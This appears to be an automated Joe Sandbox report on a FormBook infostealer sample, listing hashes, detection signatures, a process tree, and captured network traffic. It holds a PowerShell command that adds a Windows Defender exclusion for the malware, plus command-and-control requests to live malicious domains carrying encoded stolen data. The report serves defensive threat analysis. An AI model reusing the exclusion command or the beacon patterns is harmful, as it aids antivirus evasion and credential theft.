Edit tour

Windows Analysis Report
AAHiVVNIKQESryT.exe

Overview

General Information

Sample name:	AAHiVVNIKQESryT.exe
Analysis ID:	1637253
MD5:	3e6924743e1faa6c6113af873fd2382f
SHA1:	467f84d3f04650341971c35db224ff5f780392ce
SHA256:	0d173d647ff21c983845365edb6cfaab515479dd8eb6cb47f3c2295afffe1004
Tags:	exeInvoiceuser-cocaman
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

AAHiVVNIKQESryT.exe (PID: 6784 cmdline: "C:\Users\user\Desktop\AAHiVVNIKQESryT.exe" MD5: 3E6924743E1FAA6C6113AF873FD2382F)

powershell.exe (PID: 8376 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AAHiVVNIKQESryT.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 8384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 8568 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

AAHiVVNIKQESryT.exe (PID: 8392 cmdline: "C:\Users\user\Desktop\AAHiVVNIKQESryT.exe" MD5: 3E6924743E1FAA6C6113AF873FD2382F)

Q1NBabd2fJUnEL1mh.exe (PID: 5660 cmdline: "C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\WPLq9gsPS.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

help.exe (PID: 8684 cmdline: "C:\Windows\SysWOW64\help.exe" MD5: DD40774E56D4C44B81F2DFA059285E75)

Q1NBabd2fJUnEL1mh.exe (PID: 5256 cmdline: "C:\Program Files (x86)\EtFNDzdgxWzOkoBUssZxuMOhrAllqSLLrtnltdKCUnBcvXjavZuB\ckIB1Gniy.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

firefox.exe (PID: 9068 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000009.00000002.1467523310.0000000001180000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.3753846723.0000000002E70000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.1466838131.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000010.00000002.3756250382.0000000004930000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.3753804208.0000000002E20000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.3751883739.0000000002670000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.3753682119.0000000003A80000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.1470339779.0000000002410000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Process Memory Space: AAHiVVNIKQESryT.exe PID: 6784	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.AAHiVVNIKQESryT.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
9.2.AAHiVVNIKQESryT.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AAHiVVNIKQESryT.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AAHiVVNIKQESryT.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\AAHiVVNIKQESryT.exe", ParentImage: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe, ParentProcessId: 6784, ParentProcessName: AAHiVVNIKQESryT.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AAHiVVNIKQESryT.exe", ProcessId: 8376, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AAHiVVNIKQESryT.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AAHiVVNIKQESryT.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\AAHiVVNIKQESryT.exe", ParentImage: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe, ParentProcessId: 6784, ParentProcessName: AAHiVVNIKQESryT.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AAHiVVNIKQESryT.exe", ProcessId: 8376, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.9c555697-d77.cfd/amnq/	Avira URL Cloud: Label: malware
Source: http://www.warc.tech/eorp/?5DRt9L=P1vvy/dPuZySW3ie6ImYQdSdkyzuTqB9P8sDpu7iGqDyRNA9IK9U6gn9swRUfjIPt0F9LM8PGucdQdBcQwfEwcFEvHe9JdgqP6IxEobNS6yyx4RFPMP79LeYSBxZUIQJGQ==&Jnlx=4d8h52Q8l6V	Avira URL Cloud: Label: malware
Source: http://www.dresses-executive.sbs/iz5a/	Avira URL Cloud: Label: malware
Source: http://www.lingkungan.xyz/1vho/?5DRt9L=HV0qpqyBt23es1JBKeA8Pyq95JhrjRymCCUWzkfvasXJsLYYlT2qpBshMc8nq0AWHyw4B9H3kdbdE1jmU/iMawZKFq1512GJoZ0Mmk6sVD/WmyzKEV/U5KgThlCj49W+iA==&Jnlx=4d8h52Q8l6V	Avira URL Cloud: Label: malware
Source: http://www.warc.tech/eorp/	Avira URL Cloud: Label: malware
Source: http://www.dresses-executive.sbs/iz5a/?5DRt9L=pCvqmtlE75lEZJwOi03uGzDLbgcrrnG1Tr2tBLLNc3COwvxFaBgW5yh1DMB07sKYTi7jZyf5CKVmTJZJbtCzrAVBkkCJYQziQhN2ZKzaDGE9S5wpDU9aqmM0BLDCDjol0Q==&Jnlx=4d8h52Q8l6V	Avira URL Cloud: Label: malware
Source: http://www.9c555697-d77.cfd/amnq/?Jnlx=4d8h52Q8l6V&5DRt9L=JIexyz33k5t71XYT4BgoovbcOUCpfAuBWehOSL56f6eEWDxaBpIRc089zthz9wojunS1s3EaCRp6ZcIdmO3fbdkvNsFvDfUjNz+4mM8fNkDVDnOch6BMatqHxmXzDbtteQ==	Avira URL Cloud: Label: malware
Source: http://www.lingkungan.xyz/1vho/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: AAHiVVNIKQESryT.exe	Virustotal: Detection: 42%			Perma Link
Source: AAHiVVNIKQESryT.exe	ReversingLabs: Detection: 42%

Yara detected FormBook

Source: Yara match	File source: 9.2.AAHiVVNIKQESryT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.AAHiVVNIKQESryT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1467523310.0000000001180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3753846723.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1466838131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3756250382.0000000004930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3753804208.0000000002E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3751883739.0000000002670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3753682119.0000000003A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1470339779.0000000002410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: AAHiVVNIKQESryT.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: AAHiVVNIKQESryT.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: wntdll.pdbUGP source: AAHiVVNIKQESryT.exe, 00000009.00000002.1468526331.0000000001480000.00000040.00001000.00020000.00000000.sdmp, help.exe, 0000000C.00000003.1469095868.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000C.00000003.1466998212.0000000002CEA000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3754014874.0000000003040000.00000040.00001000.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3754014874.00000000031DE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: AAHiVVNIKQESryT.exe, AAHiVVNIKQESryT.exe, 00000009.00000002.1468526331.0000000001480000.00000040.00001000.00020000.00000000.sdmp, help.exe, help.exe, 0000000C.00000003.1469095868.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000C.00000003.1466998212.0000000002CEA000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3754014874.0000000003040000.00000040.00001000.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3754014874.00000000031DE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: BmQS.pdbSHA256 source: AAHiVVNIKQESryT.exe
Source:	Binary string: BmQS.pdb source: AAHiVVNIKQESryT.exe
Source:	Binary string: help.pdbGCTL source: AAHiVVNIKQESryT.exe, 00000009.00000002.1467764867.00000000011D8000.00000004.00000020.00020000.00000000.sdmp, Q1NBabd2fJUnEL1mh.exe, 0000000B.00000002.3753043049.000000000150E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: help.pdb source: AAHiVVNIKQESryT.exe, 00000009.00000002.1467764867.00000000011D8000.00000004.00000020.00020000.00000000.sdmp, Q1NBabd2fJUnEL1mh.exe, 0000000B.00000002.3753043049.000000000150E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: Q1NBabd2fJUnEL1mh.exe, 0000000B.00000000.1383188230.000000000059F000.00000002.00000001.01000000.0000000B.sdmp, Q1NBabd2fJUnEL1mh.exe, 00000010.00000002.3752571352.000000000059F000.00000002.00000001.01000000.0000000B.sdmp

Source: C:\Windows\SysWOW64\help.exe

Code function: 12_2_0268C3D0 FindFirstFileW,FindNextFileW,FindClose,

12_2_0268C3D0

Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 4x nop then jmp 06FD8EB9h	4_2_06FD843E
Source: C:\Windows\SysWOW64\help.exe	Code function: 4x nop then xor eax, eax	12_2_02679E10
Source: C:\Windows\SysWOW64\help.exe	Code function: 4x nop then pop edi	12_2_0267E064
Source: C:\Windows\SysWOW64\help.exe	Code function: 4x nop then mov ebx, 00000004h	12_2_02F704F8

Networking

Performs DNS queries to domains with low reputation

Source:	DNS query: www.quantumxr.xyz
Source:	DNS query: www.lingkungan.xyz
Source:	DNS query: www.031235045.xyz
Source:	DNS query: www.bigjoy.xyz

Source: Joe Sandbox View	IP Address: 144.76.229.203 144.76.229.203
Source: Joe Sandbox View	IP Address: 69.57.163.64 69.57.163.64
Source: Joe Sandbox View	IP Address: 77.222.42.122 77.222.42.122

Source: Joe Sandbox View

ASN Name: AMAZON-02US AMAZON-02US

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /s7xs/?5DRt9L=xcMJ8dHCBqmRN/v8A9X3SQFFEvK7hDYfq5HSOXvlsOwc7SqmLqODR0c7NEVchTWYh0j1Mb1wg8ygaKr+DeyKrtHFcQMWuW96wd94sUp+OlXKqppquS4h9Z/dhbxaNEP74Q==&Jnlx=4d8h52Q8l6V HTTP/1.1Host: www.paoginbcn.netAccept: /Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
Source: global traffic	HTTP traffic detected: GET /bd6u/?5DRt9L=C699ZhSusvxhZ79sGIyx/jAntutNR/TTEg+UR4pbUkUSuK2bkyYOQkP8ElyXgHmB/M1sj/T1LBz/t4SesGYN0Qr9L41o4LAt+cmIBTsxkx7Ip6X7RCa2szy4CV9O8xMrEA==&Jnlx=4d8h52Q8l6V HTTP/1.1Host: www.quantumxr.xyzAccept: /Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
Source: global traffic	HTTP traffic detected: GET /amnq/?Jnlx=4d8h52Q8l6V&5DRt9L=JIexyz33k5t71XYT4BgoovbcOUCpfAuBWehOSL56f6eEWDxaBpIRc089zthz9wojunS1s3EaCRp6ZcIdmO3fbdkvNsFvDfUjNz+4mM8fNkDVDnOch6BMatqHxmXzDbtteQ== HTTP/1.1Host: www.9c555697-d77.cfdAccept: /Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
Source: global traffic	HTTP traffic detected: GET /ra8c/?5DRt9L=FCJW9xjil5qugBSRiQA6TYMmKzFBES9fh1uxvnoCRwKx+kuUdPq0TiEctR6JEKFXsUKvjlQG/5hIwT1d+q0jzVipDd0Nf0nthOWWV9orVsXCSc73StD9HRGKnb8LgxNwMA==&Jnlx=4d8h52Q8l6V HTTP/1.1Host: www.thefounder.ceoAccept: /Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
Source: global traffic	HTTP traffic detected: GET /1vho/?5DRt9L=HV0qpqyBt23es1JBKeA8Pyq95JhrjRymCCUWzkfvasXJsLYYlT2qpBshMc8nq0AWHyw4B9H3kdbdE1jmU/iMawZKFq1512GJoZ0Mmk6sVD/WmyzKEV/U5KgThlCj49W+iA==&Jnlx=4d8h52Q8l6V HTTP/1.1Host: www.lingkungan.xyzAccept: /Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
Source: global traffic	HTTP traffic detected: GET /hb3t/?5DRt9L=9KXb6qBxMll9f4x2p0s5tKTO97R+nUCdHsPBbbY6H5bX94ZOqhaq0szPM69Abc7OasYSx8zxfbGo3o80iaP4S6paxGG6t1OW5ik9nwhfMTlT1yVlUTn/6Odj5xY9aqkXSg==&Jnlx=4d8h52Q8l6V HTTP/1.1Host: www.nexstep.liveAccept: /Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
Source: global traffic	HTTP traffic detected: GET /tjx1/?5DRt9L=TG2MQl+RzAjlK5FmB4vIzhZYom3se92/rpfSq0JUGMuU4ShRAQPdpLxTTwO0YSgd+qc50+/9J/dCy7dn7Bv3KnNVF8HdM5WY6MJvAQJkBPh8MY5c48u7o+mfmirZZevBWQ==&Jnlx=4d8h52Q8l6V HTTP/1.1Host: www.031235045.xyzAccept: /Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
Source: global traffic	HTTP traffic detected: GET /freb/?5DRt9L=CrVXR/tglfI2Tw26jNQpKKBtePCBpzNCR35NxdnTgAeIWyg43F22Hb45FwdJBD3fE3YCNnYYiArhrGggW044HAJ1Y0n2lUDIs9fh/QdXOqIHOCpGAe7bF73BFELKGHxUcA==&Jnlx=4d8h52Q8l6V HTTP/1.1Host: www.truay.siteAccept: /Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
Source: global traffic	HTTP traffic detected: GET /0zpa/?Jnlx=4d8h52Q8l6V&5DRt9L=Arj7slIyYHdYIdItBvD/yug6zK1ulobzsX4Q/fC0Gb6wamVG7muUcu/e1DE+A+CXMGlNeQBc70XQmb9DcRsoru/ZkIXRNT/kTSDrnRBKwct1+oJRm3wm9uVuC7YcxPquoQ== HTTP/1.1Host: www.playav.mobiAccept: /Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
Source: global traffic	HTTP traffic detected: GET /eorp/?5DRt9L=P1vvy/dPuZySW3ie6ImYQdSdkyzuTqB9P8sDpu7iGqDyRNA9IK9U6gn9swRUfjIPt0F9LM8PGucdQdBcQwfEwcFEvHe9JdgqP6IxEobNS6yyx4RFPMP79LeYSBxZUIQJGQ==&Jnlx=4d8h52Q8l6V HTTP/1.1Host: www.warc.techAccept: /Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
Source: global traffic	HTTP traffic detected: GET /mik0/?Jnlx=4d8h52Q8l6V&5DRt9L=MZodc8OlGt8s8YeqJAB5YyMn8PO8JKHrs5+7JFO7C2wIMEQuo0OiAGAhRRReq0xMS+0PcdUJklm1hYNxl2dPIdj1lUCZ45gDqvalongPxu5iR0CkpzecQtvLaEGZ4W2eMA== HTTP/1.1Host: www.448828.partyAccept: /Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
Source: global traffic	HTTP traffic detected: GET /iz5a/?5DRt9L=pCvqmtlE75lEZJwOi03uGzDLbgcrrnG1Tr2tBLLNc3COwvxFaBgW5yh1DMB07sKYTi7jZyf5CKVmTJZJbtCzrAVBkkCJYQziQhN2ZKzaDGE9S5wpDU9aqmM0BLDCDjol0Q==&Jnlx=4d8h52Q8l6V HTTP/1.1Host: www.dresses-executive.sbsAccept: /Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
Source: global traffic	HTTP traffic detected: GET /7ao9/?Jnlx=4d8h52Q8l6V&5DRt9L=0FCTgvFtttb/k3M7HElyhfE+VLi2VS+ZsM+qrGqWDjjgnBB1I9XqVJ2YzS96KRFB5ygIP+7H9rFjKFpZ8FUysI4KuQ3L7ipwmY9cOvQsiZINSgiW+xl7Q+ONWkfW0lsdUw== HTTP/1.1Host: www.bigjoy.xyzAccept: /Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
Source: global traffic	HTTP traffic detected: GET /vrgg/?5DRt9L=0tsLL7PeGZ+MuFGr0RKEmyjy7iCQkNx0y+nhDKeS4rHoxyWsWUYtFIECofPisLkh7nEPrXMRdcFp7EDKjYXYL1CqUgvEmX4VBfWtaqlykbul75XWAvMerghbLwAF6Na5EQ==&Jnlx=4d8h52Q8l6V HTTP/1.1Host: www.klass.teamAccept: /Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
Source: global traffic	HTTP traffic detected: GET /1hc0/?5DRt9L=qe5zJE97Y1Od+1YRU3JU1DJQ64YgQhmRIfUAmxXzD+vXbpn92cvHcFVamkgodqv0YEztxSYAbCj5dzR2TtR9fUM13qVPKL4KfYbiD793gl9fhbhOVcfOA6Zed44ppX1Pgw==&Jnlx=4d8h52Q8l6V HTTP/1.1Host: www.calimade.netAccept: /Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50

Source: global traffic	DNS traffic detected: DNS query: www.paoginbcn.net
Source: global traffic	DNS traffic detected: DNS query: www.quantumxr.xyz
Source: global traffic	DNS traffic detected: DNS query: www.9c555697-d77.cfd
Source: global traffic	DNS traffic detected: DNS query: www.thefounder.ceo
Source: global traffic	DNS traffic detected: DNS query: www.lingkungan.xyz
Source: global traffic	DNS traffic detected: DNS query: www.nexstep.live
Source: global traffic	DNS traffic detected: DNS query: www.031235045.xyz
Source: global traffic	DNS traffic detected: DNS query: www.truay.site
Source: global traffic	DNS traffic detected: DNS query: www.playav.mobi
Source: global traffic	DNS traffic detected: DNS query: www.warc.tech
Source: global traffic	DNS traffic detected: DNS query: www.448828.party
Source: global traffic	DNS traffic detected: DNS query: www.dresses-executive.sbs
Source: global traffic	DNS traffic detected: DNS query: www.bigjoy.xyz
Source: global traffic	DNS traffic detected: DNS query: www.klass.team
Source: global traffic	DNS traffic detected: DNS query: www.calimade.net

Source: unknown

HTTP traffic detected: POST /bd6u/ HTTP/1.1Host: www.quantumxr.xyzAccept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: http://www.quantumxr.xyzReferer: http://www.quantumxr.xyz/bd6u/Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 207User-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50Data Raw: 35 44 52 74 39 4c 3d 50 34 56 64 61 58 69 6a 68 4b 55 4f 63 65 55 4d 58 70 37 44 37 43 70 6e 34 2b 78 65 51 71 2f 34 43 78 57 51 58 75 74 65 4c 33 6b 66 75 66 71 39 6e 51 46 64 4a 30 76 32 48 31 65 42 6f 47 4b 51 68 4f 52 6a 6a 4e 57 58 4e 6d 7a 38 67 70 6a 48 72 45 30 51 39 58 48 4b 62 59 30 76 30 75 67 4e 6d 2b 43 66 42 7a 77 4e 2b 41 79 4a 33 59 33 54 54 42 57 4e 37 67 32 4e 4b 56 38 72 74 43 6f 76 58 76 36 39 73 73 69 4c 50 49 36 72 63 6d 6a 45 39 2b 73 4e 50 35 2b 64 46 5a 73 41 72 69 75 59 69 31 75 6e 61 36 6b 4b 33 38 72 79 7a 71 66 36 53 4b 58 73 6f 76 53 65 50 58 48 76 42 57 51 36 6c 4d 65 4c 48 66 41 3d Data Ascii: 5DRt9L=P4VdaXijhKUOceUMXp7D7Cpn4+xeQq/4CxWQXuteL3kfufq9nQFdJ0v2H1eBoGKQhORjjNWXNmz8gpjHrE0Q9XHKbY0v0ugNm+CfBzwN+AyJ3Y3TTBWN7g2NKV8rtCovXv69ssiLPI6rcmjE9+sNP5+dFZsAriuYi1una6kK38ryzqf6SKXsovSePXHvBWQ6lMeLHfA=

